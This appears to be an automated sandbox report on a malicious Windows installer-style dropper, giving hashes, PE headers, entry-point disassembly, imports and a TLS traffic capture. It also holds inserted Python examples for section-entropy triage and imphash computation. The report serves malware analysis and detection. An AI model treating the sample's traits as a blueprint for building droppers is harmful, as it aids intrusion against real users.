                                                          SHA-512:021D9AF52E68CB7A3B0042D9ED6C9418552EE16DF966F9CCEDD458567C47D70471CB8851A69D3982D64571369664FAEEAE3BE90E2E88A909005B9CDB73679C82
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$..-`..~`..~`..~i.4~b..~{.;~c..~`..~...~..?~a..~{.9~a..~{..~P..~{..~Y..~{..~e..~{.<~a..~{.=~a..~{.:~a..~Rich`..~........................PE..d.....M.........." .........f.......q........cy..........................................@.............................................m......<....P...........=...0..P....`.......................................................................................text............................... ..`.rdata..-...........................@..@.data...0L.......8..................@....pdata...=.......>..................@..@.rsrc........P......................@..@.reloc..R....`......................@..B........................................................................................................................................................................................................................................
                                                          Process:C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):829264
                                                          Entropy (8bit):6.553848816796836
                                                          Encrypted:false
                                                          SSDEEP:12288:QgzGPEett9Mw9HfBCddjMb2NQVmTW75JfmyyKWeHQGoko+1:HzJetPMw9HfBCrMb2Kc6dmyyKWewGzB1
                                                          MD5:366FD6F3A451351B5DF2D7C4ECF4C73A
                                                          SHA1:50DB750522B9630757F91B53DF377FD4ED4E2D66
                                                          SHA-256:AE3CB6C6AFBA9A4AA5C85F66023C35338CA579B30326DD02918F9D55259503D5
                                                          SHA-512:2DE764772B68A85204B7435C87E9409D753C2196CF5B2F46E7796C99A33943E167F62A92E8753EAA184CD81FB14361E83228EB1B474E0C3349ED387EC93E6130
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........pm...>...>...>..>...>...>F..>...>...>...>..>...>..>...>D..>...>...>...>...>...>...>Rich...>........................PE..d......M.........." ..........................sy............................. ......A.....@.........................................pt.......`..(...............pb......P............................................................................................text...F........................... ..`.rdata..............................@..@.data...L}... ...R..................@....pdata..pb.......d...Z..............@..@_CONST..............................@...text.....2... ...4..................@.. data.........`......................@..@.rsrc................v..............@..@.reloc...............z..............@..B................................................................................................................................
                                                          Process:C:\Users\user\Desktop\KClGcCpDAP.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):8631353
                                                          Entropy (8bit):7.988187055903863
                                                          Encrypted:false
                                                          SSDEEP:196608:cfUS5CWOJNmZD1pqgeVSFCIrRnau//ItQ7dMzxbOmy1wbGv:sb5dQstG2VJ/kCdMEmkv
                                                          MD5:4ED56BCA0F099784A4A341321C3D0695
                                                          SHA1:46B7D39BBB0C1F75717EA86CC9ECD540995B966B
                                                          SHA-256:D33EE40EC6CE95BEF2DFE041473C7164F06E8659FBECCC4CD41ED5635E80AE20
                                                          SHA-512:D813E18E9CD7E729B93562B2C5141B7E2DEC82DD387AA367C563881C59ED5D6FA0BE44CA43A5319AC019A936B1D06C9EE9215CC1417B7284B32F52D7A645624C
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A!.S.@...@...@......@.....y@......@..."|..@..."{..@..."z.#@...8...@...8...@...@~.PA...#z.N@...#...@...@...@...#}..@..Rich.@..................PE..L......Z.....................t....................@..........................P............@.............................................8:.......................=..Pv..T....................v......0p..@...................4........................text...7........................... ..`.rdata..`...........................@..@.data...0...........................@....wixburn8...........................@..@.rsrc...8:.......<..................@..@.reloc...=.......>..................@..B................................................................................................................................................................................................................................................
                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):7.988227332156627
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:KClGcCpDAP.exe
                                                          File size:8'656'211 bytes
                                                          MD5:61d2baf57c3ed6eda2d72720fc54ed04
                                                          SHA1:8c6ce6dc798b3d085102b96ffea2913efe5fb243
                                                          SHA256:08e1d8d41bef83310ed290e5b8b3821d7ead8f66709c90cd4caa27c567ab4e80
                                                          SHA512:9ae8f5ed0c0972955a1092851a6787a8c236ff3639ec2eaaeacc53298080c55c7ab38e096380e4ce961b87831eae8110872475b45776fd1c2df19e5b8c76c520
                                                          SSDEEP:196608:cfUS5CWOJNmZD1pqgeVSFCIrRnau//ItQ7dMzxbOmy1wbGZ:sb5dQstG2VJ/kCdMEmkZ
                                                          TLSH:B396333294504023F7F606B3EC2896343E7CD724075588AAE7E8AD2D3EB84D567BB257
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A!.S.@...@...@.......@......y@.......@..."|..@..."{..@..."z.#@...8...@...8...@...@~.PA...#z.N@...#...@...@...@...#}..@..Rich.@.
                                                          Icon Hash:2d2e3797b32b2b99
                                                          Entrypoint:0x42e2a6
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP, NET_RUN_FROM_SWAP
                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x5A10AD86 [Sat Nov 18 22:00:38 2017 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
                                                          OS Version Minor:1
                                                          File Version Major:5
                                                          File Version Minor:1
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:1
                                                          Import Hash:d7e2fd259780271687ffca462b9e69b7
                                                          Instruction
                                                          call 00007F913C80F9DFh
                                                          jmp 00007F913C80F353h
                                                          mov eax, dword ptr [esp+08h]
                                                          mov ecx, dword ptr [esp+10h]
                                                          or ecx, eax
                                                          mov ecx, dword ptr [esp+0Ch]
                                                          jne 00007F913C80F4CBh
                                                          mov eax, dword ptr [esp+04h]
                                                          mul ecx
                                                          retn 0010h
                                                          push ebx
                                                          mul ecx
                                                          mov ebx, eax
                                                          mov eax, dword ptr [esp+08h]
                                                          mul dword ptr [esp+14h]
                                                          add ebx, eax
                                                          mov eax, dword ptr [esp+08h]
                                                          mul ecx
                                                          add edx, ebx
                                                          pop ebx
                                                          retn 0010h
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          cmp cl, 00000040h
                                                          jnc 00007F913C80F4D7h
                                                          cmp cl, 00000020h
                                                          jnc 00007F913C80F4C8h
                                                          shrd eax, edx, cl
                                                          shr edx, cl
                                                          ret
                                                          mov eax, edx
                                                          xor edx, edx
                                                          and cl, 0000001Fh
                                                          shr eax, cl
                                                          ret
                                                          xor eax, eax
                                                          xor edx, edx
                                                          ret
                                                          push ebp
                                                          mov ebp, esp
                                                          jmp 00007F913C80F4CFh
                                                          push dword ptr [ebp+08h]
                                                          call 00007F913C815D4Ch
                                                          pop ecx
                                                          test eax, eax
                                                          je 00007F913C80F4D1h
                                                          push dword ptr [ebp+08h]
                                                          call 00007F913C815DD5h
                                                          pop ecx
                                                          test eax, eax
                                                          je 00007F913C80F4A8h
                                                          pop ebp
                                                          ret
                                                          cmp dword ptr [ebp+08h], FFFFFFFFh
                                                          je 00007F913C80FD64h
                                                          jmp 00007F913C80FD41h
                                                          push ebp
                                                          mov ebp, esp
                                                          push dword ptr [ebp+08h]
                                                          call 00007F913C80FD7Dh
                                                          pop ecx
                                                          pop ebp
                                                          ret
                                                          push ebp
                                                          mov ebp, esp
                                                          test byte ptr [ebp+08h], 00000001h
                                                          push esi
                                                          mov esi, ecx
                                                          mov dword ptr [esi], 00460DB8h
                                                          je 00007F913C80F4CCh
                                                          push 0000000Ch
                                                          push esi
                                                          call 00007F913C80F49Dh
                                                          pop ecx
                                                          pop ecx
                                                          mov eax, esi
                                                          pop esi
                                                          pop ebp
                                                          Programming Language:
                                                          • [ C ] VS2008 SP1 build 30729
                                                          • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x686b4 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6d000 | 0x3a38 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x71000 | 0x3dfc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x67650 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x676a4 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x67030 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x4b000 | 0x3e0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x68234 | 0x100 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x49937 | 0x49a00 | 2319c0baa707bb66cc0bc08c55a13d8c | False | 0.5314688561120543 | data | 6.570006046413636 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x4b000 | 0x1ed60 | 0x1ee00 | 8ad6c4e18165c6d8ccdc97bab683438d | False | 0.3136386639676113 | data | 5.114228301263695 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x6a000 | 0x1730 | 0xa00 | 00fde973df27dc2d36084e16d6dddbdf | False | 0.274609375 | firmware 2005 v9319 (revision 0) N\346@\273\261\031\277D V2, 0 bytes or less, UNKNOWN2 0xffffffff, at 0 0 bytes , at 0 0 bytes , at 0x20a14600 | 3.1526594027632213 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.wixburn | 0x6c000 | 0x38 | 0x200 | fa8b93d2867fbdcd8c704888e119383d | False | 0.10546875 | data | 0.5556939563611969 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x6d000 | 0x3a38 | 0x3c00 | 44e0476fda5a721127283c44a2a0ea81 | False | 0.33079427083333335 | data | 5.546130373186753 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x71000 | 0x3dfc | 0x3e00 | dd2c47fa48872886af4c9a2e5bd90ccc | False | 0.8097278225806451 | data | 6.794335469567533 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
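The section table is the first thing a triage script reads when deciding whether a sample is packed. Note that the sections listed here account for well under 1 MB of an 8.6 MB file; the rest is an attached container (the .wixburn section marks a WiX Burn bundle), which is where the near-8 whole-file entropy comes from while the header sections themselves stay moderate. The following is an added example, not Joe Sandbox code: a parser that walks DOS header, PE signature and IMAGE_FILE_HEADER to the section table, computes each section's 8-bit entropy as the Entropy column does, decodes Characteristics into the flag names the report prints, and flags sections that are high-entropy or mapped writable and executable. It runs against a constructed minimal PE built by build_sample_pe(), not against this sample; the function names and the 7.0 threshold are this example's own choices.

```python
import math
import struct
from typing import List, NamedTuple

# Section characteristic flags from winnt.h, limited to the ones the report prints.
SECTION_FLAGS = [
    (0x00000020, "IMAGE_SCN_CNT_CODE"),
    (0x00000040, "IMAGE_SCN_CNT_INITIALIZED_DATA"),
    (0x00000080, "IMAGE_SCN_CNT_UNINITIALIZED_DATA"),
    (0x02000000, "IMAGE_SCN_MEM_DISCARDABLE"),
    (0x20000000, "IMAGE_SCN_MEM_EXECUTE"),
    (0x40000000, "IMAGE_SCN_MEM_READ"),
    (0x80000000, "IMAGE_SCN_MEM_WRITE"),
]


class Section(NamedTuple):
    name: str
    virtual_address: int
    virtual_size: int
    raw_size: int
    raw_offset: int
    characteristics: int
    entropy: float


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 for a constant stream, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def describe_characteristics(flags: int) -> str:
    """Render a Characteristics DWORD the way the report's last column does."""
    return ", ".join(name for bit, name in SECTION_FLAGS if flags & bit)


def parse_sections(pe: bytes) -> List[Section]:
    """Walk DOS header -> PE signature -> IMAGE_FILE_HEADER -> section table and
    compute every section's entropy from its raw bytes on disk."""
    if pe[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    file_hdr = e_lfanew + 4
    num_sections = struct.unpack_from("<H", pe, file_hdr + 2)[0]
    size_of_opt = struct.unpack_from("<H", pe, file_hdr + 16)[0]
    table = file_hdr + 20 + size_of_opt          # IMAGE_FILE_HEADER is 20 bytes
    out = []
    for i in range(num_sections):
        name, vsize, vaddr, rsize, roff, _, _, _, _, flags = struct.unpack_from(
            "<8sIIIIIIHHI", pe, table + 40 * i)  # IMAGE_SECTION_HEADER is 40 bytes
        raw = pe[roff:roff + rsize]
        out.append(Section(name.rstrip(b"\0").decode("ascii", "replace"),
                           vaddr, vsize, rsize, roff, flags, shannon_entropy(raw)))
    return out


def suspicious_sections(sections: List[Section], threshold: float = 7.0) -> List[str]:
    """Names of sections that look packed or encrypted (entropy above threshold) or are
    mapped both writable and executable; either is worth a closer look in a dropper."""
    wx = 0x80000000 | 0x20000000
    return [s.name for s in sections
            if s.entropy > threshold or (s.characteristics & wx) == wx]


def build_sample_pe() -> bytes:
    """Constructed minimal PE32 image for this example (not the report's sample): a
    zero-filled .text and an .rsrc holding every byte value equally often, so the
    entropies are known in advance (0.0 and 8.0)."""
    specs = [  # (name, virtual address, characteristics, raw bytes)
        (b".text", 0x1000, 0x60000020, bytes(0x200)),
        (b".rsrc", 0x2000, 0x40000040, bytes(range(256)) * 4),
    ]
    opt = b"\x0b\x01" + b"\0" * 94                       # PE32 magic; rest unused here
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)   # e_lfanew = 0x40
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(specs), 0, 0, 0, len(opt), 0x0102)
    headers_len = 0x40 + 4 + 20 + len(opt) + 40 * len(specs)
    raw_off = (headers_len + 0x1FF) & ~0x1FF            # 0x200 file alignment
    first_raw = raw_off
    table, body = b"", b""
    for name, va, flags, data in specs:
        table += struct.pack("<8sIIIIIIHHI", name, len(data), va, len(data), raw_off, 0, 0, 0, 0, flags)
        body += data
        raw_off += len(data)
    image = dos + b"PE\0\0" + file_hdr + opt + table
    return image.ljust(first_raw, b"\0") + body


if __name__ == "__main__":
    for s in parse_sections(build_sample_pe()):
        print(f"{s.name:8} VA={s.virtual_address:#x} raw={s.raw_size:#x} "
              f"entropy={s.entropy:.3f} {describe_characteristics(s.characteristics)}")
```

Point the parser at a real file with `parse_sections(open(path, "rb").read())`; the same walk applies to PE32+ because the section table follows the optional header at the offset SizeOfOptionalHeader gives, whatever that header's size is.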
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x6d178 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.43185920577617326
RT_MESSAGETABLE | 0x6da20 | 0x2840 | data | English | United States | 0.28823757763975155
RT_GROUP_ICON | 0x70260 | 0x14 | data | English | United States | 1.15
RT_VERSION | 0x70274 | 0x2f0 | SysEx File - ID | English | United States | 0.4720744680851064
RT_MANIFEST | 0x70564 | 0x4d2 | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (1174), with CRLF line terminators | English | United States | 0.47568881685575365
DLL | Import
ADVAPI32.dll | RegCloseKey, RegOpenKeyExW, OpenProcessToken, AdjustTokenPrivileges, LookupPrivilegeValueW, InitiateSystemShutdownExW, GetUserNameW, RegQueryValueExW, RegDeleteValueW, CloseEventLog, OpenEventLogW, ReportEventW, ConvertStringSecurityDescriptorToSecurityDescriptorW, DecryptFileW, CreateWellKnownSid, InitializeAcl, SetEntriesInAclW, ChangeServiceConfigW, CloseServiceHandle, ControlService, OpenSCManagerW, OpenServiceW, QueryServiceStatus, SetNamedSecurityInfoW, CheckTokenMembership, AllocateAndInitializeSid, SetEntriesInAclA, SetSecurityDescriptorGroup, SetSecurityDescriptorOwner, SetSecurityDescriptorDacl, InitializeSecurityDescriptor, RegSetValueExW, RegQueryInfoKeyW, RegEnumValueW, RegEnumKeyExW, RegDeleteKeyW, RegCreateKeyExW, GetTokenInformation, CryptDestroyHash, CryptHashData, CryptCreateHash, CryptGetHashParam, CryptReleaseContext, CryptAcquireContextW, QueryServiceConfigW
USER32.dll | PeekMessageW, PostMessageW, IsWindow, WaitForInputIdle, PostQuitMessage, GetMessageW, TranslateMessage, MsgWaitForMultipleObjects, PostThreadMessageW, GetMonitorInfoW, MonitorFromPoint, IsDialogMessageW, LoadCursorW, LoadBitmapW, SetWindowLongW, GetWindowLongW, GetCursorPos, MessageBoxW, CreateWindowExW, UnregisterClassW, RegisterClassW, DefWindowProcW, DispatchMessageW
OLEAUT32.dll | VariantInit, SysAllocString, VariantClear, SysFreeString
GDI32.dll | DeleteDC, DeleteObject, SelectObject, StretchBlt, GetObjectW, CreateCompatibleDC
SHELL32.dll | CommandLineToArgvW, SHGetFolderPathW, ShellExecuteExW
ole32.dll | CoUninitialize, CoInitializeEx, CoInitialize, StringFromGUID2, CoCreateInstance, CoTaskMemFree, CLSIDFromProgID, CoInitializeSecurity
KERNEL32.dll | GetCommandLineA, GetCPInfo, GetOEMCP, CloseHandle, CreateFileW, GetProcAddress, LocalFree, HeapSetInformation, GetLastError, GetModuleHandleW, FormatMessageW, lstrlenA, lstrlenW, MultiByteToWideChar, WideCharToMultiByte, LCMapStringW, Sleep, GetLocalTime, GetModuleFileNameW, ExpandEnvironmentStringsW, GetTempPathW, GetTempFileNameW, CreateDirectoryW, GetFullPathNameW, CompareStringW, GetCurrentProcessId, WriteFile, SetFilePointer, LoadLibraryW, GetSystemDirectoryW, CreateFileA, HeapAlloc, HeapReAlloc, HeapFree, HeapSize, GetProcessHeap, FindClose, GetCommandLineW, GetCurrentDirectoryW, RemoveDirectoryW, SetFileAttributesW, GetFileAttributesW, DeleteFileW, FindFirstFileW, FindNextFileW, MoveFileExW, GetCurrentProcess, GetCurrentThreadId, InitializeCriticalSection, DeleteCriticalSection, ReleaseMutex, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, CreateProcessW, GetVersionExW, VerSetConditionMask, FreeLibrary, EnterCriticalSection, LeaveCriticalSection, GetSystemTime, GetNativeSystemInfo, GetModuleHandleExW, GetWindowsDirectoryW, GetSystemWow64DirectoryW, GetEnvironmentStringsW, VerifyVersionInfoW, GetVolumePathNameW, GetDateFormatW, GetUserDefaultUILanguage, GetSystemDefaultLangID, GetUserDefaultLangID, GetStringTypeW, ReadFile, SetFilePointerEx, DuplicateHandle, InterlockedExchange, InterlockedCompareExchange, LoadLibraryExW, CreateEventW, ProcessIdToSessionId, OpenProcess, GetProcessId, WaitForSingleObject, ConnectNamedPipe, SetNamedPipeHandleState, CreateNamedPipeW, CreateThread, GetExitCodeThread, SetEvent, WaitForMultipleObjects, InterlockedIncrement, InterlockedDecrement, ResetEvent, SetEndOfFile, SetFileTime, LocalFileTimeToFileTime, DosDateTimeToFileTime, CompareStringA, GetExitCodeProcess, SetThreadExecutionState, CopyFileExW, MapViewOfFile, UnmapViewOfFile, CreateMutexW, CreateFileMappingW, GetThreadLocale, IsValidCodePage, FindFirstFileExW, FreeEnvironmentStringsW, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, DecodePointer, WriteConsoleW, GetModuleHandleA, GlobalAlloc, GlobalFree, GetFileSizeEx, CopyFileW, VirtualAlloc, VirtualFree, SystemTimeToTzSpecificLocalTime, GetTimeZoneInformation, SystemTimeToFileTime, GetSystemInfo, VirtualProtect, VirtualQuery, GetComputerNameW, SetCurrentDirectoryW, GetFileType, GetACP, ExitProcess, GetStdHandle, InitializeCriticalSectionAndSpinCount, SetLastError, RtlUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RaiseException, LoadLibraryExA
RPCRT4.dll | UuidCreate
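The Import Hash value given above (d7e2fd259780271687ffca462b9e69b7) is an imphash: the MD5 of a normalised list of the binary's imports in import-table order, which is why two builds of the same loader with different icons or strings still share it and why it is a useful pivot across samples. As an added example, not Joe Sandbox or pefile code, here is the normalisation pefile applies before hashing, implemented over a constructed import list drawn from a few of the names listed above. Hashing this short list does not reproduce the report's value: the report hashed the binary's real import directory, the listing above does not guarantee file order, and delay-load imports (which this file has, see the DELAY_IMPORT directory) are not part of imphash. The ordinal tables are abbreviated to a handful of entries as an assumption of this example.

```python
import hashlib
from typing import Iterable, List, Tuple, Union

# pefile resolves ordinal-only imports from a few well-known DLLs to names before
# hashing. Abbreviated here as an assumption of this example; pefile ships full tables.
ORDINAL_NAMES = {
    "oleaut32": {2: "SysAllocString", 6: "SysFreeString", 8: "VariantInit", 9: "VariantClear"},
    "ws2_32": {1: "accept", 2: "bind", 3: "closesocket", 4: "connect", 23: "socket"},
}

# (dll name, function name or ordinal), in import-table order
Import = Tuple[str, Union[str, int]]


def imphash_string(imports: Iterable[Import]) -> str:
    """The 'lib.func,lib.func,...' string whose MD5 is the imphash: DLL names lower-cased
    with .dll/.ocx/.sys stripped, function names lower-cased, ordinals mapped to names
    where the table knows them and written as 'ordN' otherwise."""
    parts: List[str] = []
    for dll, func in imports:
        lib = dll.lower()
        for ext in (".ocx", ".sys", ".dll"):
            if lib.endswith(ext):
                lib = lib[: -len(ext)]
                break
        if isinstance(func, int):
            name = ORDINAL_NAMES.get(lib, {}).get(func, f"ord{func}")
        else:
            name = func
        parts.append(f"{lib}.{name.lower()}")
    return ",".join(parts)


def imphash(imports: Iterable[Import]) -> str:
    """MD5 of the normalised import string, hex-encoded."""
    return hashlib.md5(imphash_string(imports).encode("ascii")).hexdigest()


# Constructed import list for the example: a few names from the report's listing, with one
# entry written as an ordinal to show the mapping step.
SAMPLE_IMPORTS: List[Import] = [
    ("ADVAPI32.dll", "RegCloseKey"),
    ("ADVAPI32.dll", "RegOpenKeyExW"),
    ("OLEAUT32.dll", 8),                 # by ordinal -> oleaut32.variantinit
    ("KERNEL32.dll", "GetProcAddress"),
]

if __name__ == "__main__":
    print(imphash_string(SAMPLE_IMPORTS))
    print(imphash(SAMPLE_IMPORTS))
```

Because the hash is order-sensitive, reordering imports in a rebuilt binary changes it while renaming the DLL's case does not; both properties follow directly from the normalisation above.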
Language of compilation system | Country where language is spoken
English | United States
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 7, 2024 07:14:56.255572081 CEST | 49739 | 443 | 192.168.2.4 | 188.114.96.3
Oct 7, 2024 07:14:56.255620003 CEST | 443 | 49739 | 188.114.96.3 | 192.168.2.4
Oct 7, 2024 07:14:56.255692005 CEST | 49739 | 443 | 192.168.2.4 | 188.114.96.3
Oct 7, 2024 07:14:56.256922960 CEST | 49739 | 443 | 192.168.2.4 | 188.114.96.3
Oct 7, 2024 07:14:56.256937981 CEST | 443 | 49739 | 188.114.96.3 | 192.168.2.4
Oct 7, 2024 07:14:56.725415945 CEST | 443 | 49739 | 188.114.96.3 | 192.168.2.4
Oct 7, 2024 07:14:56.725647926 CEST | 49739 | 443 | 192.168.2.4 | 188.114.96.3
Oct 7, 2024 07:14:56.731344938 CEST | 49739 | 443 | 192.168.2.4 | 188.114.96.3
Oct 7, 2024 07:14:56.731374025 CEST | 443 | 49739 | 188.114.96.3 | 192.168.2.4
Oct 7, 2024 07:14:56.731812954 CEST | 443 | 49739 | 188.114.96.3 | 192.168.2.4
Oct 7, 2024 07:14:56.781053066 CEST | 49739 | 443 | 192.168.2.4 | 188.114.96.3
Oct 7, 2024 07:14:56.786292076 CEST | 49739 | 443 | 192.168.2.4 | 188.114.96.3
Oct 7, 2024 07:14:56.786325932 CEST | 49739 | 443 | 192.168.2.4 | 188.114.96.3
Oct 7, 2024 07:14:56.786413908 CEST | 443 | 49739 | 188.114.96.3 | 192.168.2.4
Oct 7, 2024 07:14:57.185745955 CEST | 443 | 49739 | 188.114.96.3 | 192.168.2.4
Oct 7, 2024 07:14:57.185822010 CEST | 443 | 49739 | 188.114.96.3 | 192.168.2.4
Oct 7, 2024 07:14:57.185856104 CEST | 443 | 49739 | 188.114.96.3 | 192.168.2.4
Oct 7, 2024 07:14:57.185883045 CEST | 443 | 49739 | 188.114.96.3 | 192.168.2.4
Oct 7, 2024 07:14:57.185883999 CEST | 49739 | 443 | 192.168.2.4 | 188.114.96.3
Oct 7, 2024 07:14:57.185909986 CEST | 443 | 49739 | 188.114.96.3 | 192.168.2.4
Oct 7, 2024 07:14:57.185923100 CEST | 443 | 49739 | 188.114.96.3 | 192.168.2.4
Oct 7, 2024 07:14:57.185935020 CEST | 49739 | 443 | 192.168.2.4 | 188.114.96.3
Oct 7, 2024 07:14:57.185965061 CEST | 49739 | 443 | 192.168.2.4 | 188.114.96.3
Oct 7, 2024 07:14:57.185980082 CEST | 443 | 49739 | 188.114.96.3 | 192.168.2.4
Oct 7, 2024 07:14:57.186248064 CEST | 443 | 49739 | 188.114.96.3 | 192.168.2.4
Oct 7, 2024 07:14:57.186280012 CEST | 443 | 49739 | 188.114.96.3 | 192.168.2.4
Oct 7, 2024 07:14:57.186290026 CEST | 49739 | 443 | 192.168.2.4 | 188.114.96.3
Oct 7, 2024 07:14:57.186321974 CEST | 443 | 49739 | 188.114.96.3 | 192.168.2.4
Oct 7, 2024 07:14:57.186374903 CEST | 49739 | 443 | 192.168.2.4 | 188.114.96.3
Oct 7, 2024 07:14:57.190468073 CEST | 443 | 49739 | 188.114.96.3 | 192.168.2.4
Oct 7, 2024 07:14:57.234174013 CEST | 49739 | 443 | 192.168.2.4 | 188.114.96.3
Oct 7, 2024 07:14:57.234220028 CEST | 443 | 49739 | 188.114.96.3 | 192.168.2.4
Oct 7, 2024 07:14:57.273104906 CEST | 443 | 49739 | 188.114.96.3 | 192.168.2.4
Oct 7, 2024 07:14:57.273166895 CEST | 49739 | 443 | 192.168.2.4 | 188.114.96.3
Oct 7, 2024 07:14:57.273175001 CEST | 443 | 49739 | 188.114.96.3 | 192.168.2.4
Oct 7, 2024 07:14:57.273188114 CEST | 443 | 49739 | 188.114.96.3 | 192.168.2.4
                                                          Oct 7, 2024 07:14:57.273236990 CEST49739443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:57.273240089 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.273251057 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.273313999 CEST49739443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:57.273332119 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.273889065 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.273926020 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.273940086 CEST49739443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:57.273955107 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.274008036 CEST49739443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:57.274482012 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.274547100 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.274585962 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.274594069 CEST49739443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:57.274605989 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.274655104 CEST49739443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:57.274868965 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.275243044 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.275280952 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.275286913 CEST49739443192.168.2.4188.114.96.3
                                                          Oct 7, 2024 07:14:57.275300026 CEST44349739188.114.96.3192.168.2.4
                                                          Oct 7, 2024 07:14:57.275352001 CEST49739443192.168.2.4188.114.96.3
